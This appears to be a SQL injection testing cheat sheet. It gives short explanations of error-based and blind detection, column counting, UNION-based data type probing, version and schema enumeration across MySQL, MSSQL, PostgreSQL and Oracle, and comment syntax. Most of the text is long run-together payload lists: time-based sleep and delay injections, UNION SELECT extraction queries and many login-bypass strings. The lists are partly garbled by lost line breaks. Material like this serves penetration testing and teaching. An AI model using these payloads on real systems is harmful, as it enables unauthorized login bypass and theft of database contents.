If you are lucky, you will see a database internal error with a parsing error of the SQL statement. Otherwise you see an internal database error, or a general error without any details.
In case of a Blind SQL injection, you observe a different HTTP response in terms of content or bytes. In the worst case you need to incorporate a payload that initiates DNS/HTTP request.
A'
A' OR 1=1 -- a space after the comment
A' AND 1=0 -- a space after the comment
Automation - Payloads
Identify SQL Injection on your data input. Trigger an error or change the data set.
'''```,"""'"`')")`)'))"))`)))///\\\;||%22%27%3B*1or1=1--1' or 1=1 --'OR1=1--' or "-- or # 'OR'1'OR1-- -" OR "" = "" OR 1 = 1 -- -' OR '' = ''=''LIKE''=0--+ OR 1=1' OR 'x'='x' AND id IS NULL; --'''''''''''''UNION SELECT '2%00+ % @variable local variable@@variable global variableAND 1AND 0AND trueAND false1-false1-true1*56-21' ORDER BY 1--+1' ORDER BY 2--+1' ORDER BY 3--+1' ORDER BY 1,2--+1' ORDER BY 1,2,3--+1' GROUP BY 1,2,--+1' GROUP BY 1,2,3--+' GROUP BY columnnames having 1=1 ---1' UNION SELECT 1,2,3--+' UNION SELECT sum(columnname ) from tablename ---1 UNION SELECT 1 INTO @,@-1 UNION SELECT 1 INTO @,@,@,(select * from (select(sleep(10)))a)%2c(select%20*%20from%20(select(sleep(10)))a)';WAITFOR DELAY '0:0:30'--sleep(5)#1 or sleep(5)#"or sleep(5)#' or sleep(5)#" or sleep(5)="'or sleep(5)='1) or sleep(5)#") or sleep(5)="') or sleep(5)='1)) or sleep(5)#")) or sleep(5)="')) or sleep(5)=';waitfor delay '0:0:5'--);waitfor delay '0:0:5'--';waitfordelay'0:0:5'--";waitfor delay '0:0:5'--');waitfor delay '0:0:5'--");waitfordelay'0:0:5'--));waitfordelay'0:0:5'--'));waitfor delay '0:0:5'--"));waitfor delay '0:0:5'--benchmark(10000000,MD5(1))#1 or benchmark(10000000,MD5(1))#" or benchmark(10000000,MD5(1))#'or benchmark(10000000,MD5(1))#1) or benchmark(10000000,MD5(1))#") or benchmark(10000000,MD5(1))#') or benchmark(10000000,MD5(1))#1)) or benchmark(10000000,MD5(1))#")) or benchmark(10000000,MD5(1))#')) or benchmark(10000000,MD5(1))#pg_sleep(5)--1 or pg_sleep(5)--" or pg_sleep(5)--'or pg_sleep(5)--1) or pg_sleep(5)--") or pg_sleep(5)--') or pg_sleep(5)--1)) or pg_sleep(5)--")) or pg_sleep(5)--')) or pg_sleep(5)--
Columns - Order by
Non existing column reference in ORDER BY n raises an error. By this technique you determine the number of columns in the data set which is present on a specific web page.
Make sure there is a space after a comment (-- ) to comment out the rest of the SQL statement which is added by the application (processed by the backend).
A' ORDER BY 1 --
A' ORDER BY 2 --
A' ORDER BY 3 --
Column's Data type
When you know a number of columns, determine data type for each column to bring string payload into the right column within the data set.
A' UNION SELECT NULL, NULL, NULL -- respect number of columnsA'UNIONSELECT'a', NULL, NULL-- identify string columns for exploitationA' UNION SELECT 1, 'Payload', 200 --
Oracle Database - table dual
Oracle databases need to have "FROM table" clause in every SQL SELECT statement. You need to address a dual table in case you don't know a table name or you would like to evaluate an expression in the SQL statement.
A' UNION SELECT NULL, NULL, NULL FROM dual -- commentA'UNIONSELECT'a', NULL, NULLFROM dual -- QA' UNION SELECT 1, 'Payload', 200 FROM dual --
Database version
A' UNION SELECT 'A', version() -- PostgreSQLA'UNIONSELECT'A', @@version-- MySQL or MSSQLA' UNION SELECT 'A', version FROM v$instance -- Oracle DB
Tables and columns - Query data dictionary
-- MySQL, MSSQL, PostgreSQLA' UNION SELECT tablename FROM information_schema.tables -- commentA' UNION SELECT table_schema, table_name FROM information_schema.tables WHERE table_schema NOT IN ('pg_catalog','information_schema')--
A'UNIONSELECT column_name, data_type FROM information_schema.columns WHERE table_name='users'-- comment-- Oracle DatabaseA' UNION SELECT OWNER, table_name FROM all_tables -- commentA'UNIONSELECT column_name FROM all_tab_columns WHERE table_name ='TABLE'-- comment
Comments
SQL comments allow you to suppress the rest of the SQL statement after injection.
MySQL#comment-- comment [Note the space after the double dash]/*comment*//*! MYSQL Special SQL */PostgreSQL--comment/*comment*/MSQL--comment/*comment*/Oracle--commentSQLite--comment/*comment*/
Specific features and statements recognized by SQL injection cheat sheet at Burp Web Security Academy
Cheat Sheets
Cheat sheets for manual SQL injection testing
SQLI - Authentication Bypass
A special case of SQL injection in login scenarios allows a privilege escalation.
admin' --admin' #admin'/*'or1=1--' or 1=1#'or1=1/*') or '1'='1--') or ('1'='1--' UNION SELECT 1, 'anotheruser', 'doesnt matter', 1--'-'' ''&''^''*'' or 1=1 limit 1 -- -+'="or'' or ''-'' or '' '' or ''&'' or ''^'' or ''*''-||0'"-||0""-"" ""&""^""*"'--'"--"'--' / "--"" or ""-"" or "" "" or ""&"" or ""^"" or ""*"or true--" or true--' or true--") or true--') or true--' or 'x'='x') or ('x')=('x')) or (('x'))=(('x" or "x"="x") or ("x")=("x")) or (("x"))=(("xor 2 like 2or 1=1or 1=1--or 1=1#or 1=1/*admin' --admin' -- -admin' #admin'/*admin' or '2' LIKE '1admin' or 2 LIKE 2--admin' or 2 LIKE 2#admin') or 2 LIKE 2#admin') or 2 LIKE 2--admin') or ('2' LIKE '2admin') or ('2' LIKE '2'#admin') or ('2' LIKE '2'/*admin' or '1'='1admin' or '1'='1'--admin' or '1'='1'#admin' or '1'='1'/*admin'or 1=1 or ''='admin' or 1=1admin' or 1=1--admin' or 1=1#admin' or 1=1/*admin') or ('1'='1admin') or ('1'='1'--admin') or ('1'='1'#admin') or ('1'='1'/*admin') or '1'='1admin') or '1'='1'--admin') or '1'='1'#admin') or '1'='1'/*1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055admin" --admin';-- azer admin" #admin"/*admin" or "1"="1admin" or "1"="1"--admin" or "1"="1"#admin" or "1"="1"/*admin"or 1=1 or ""="admin" or 1=1admin" or 1=1--admin" or 1=1#admin" or 1=1/*admin") or ("1"="1admin") or ("1"="1"--admin") or ("1"="1"#admin") or ("1"="1"/*admin") or "1"="1admin") or "1"="1"--admin") or "1"="1"#admin") or "1"="1"/*1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
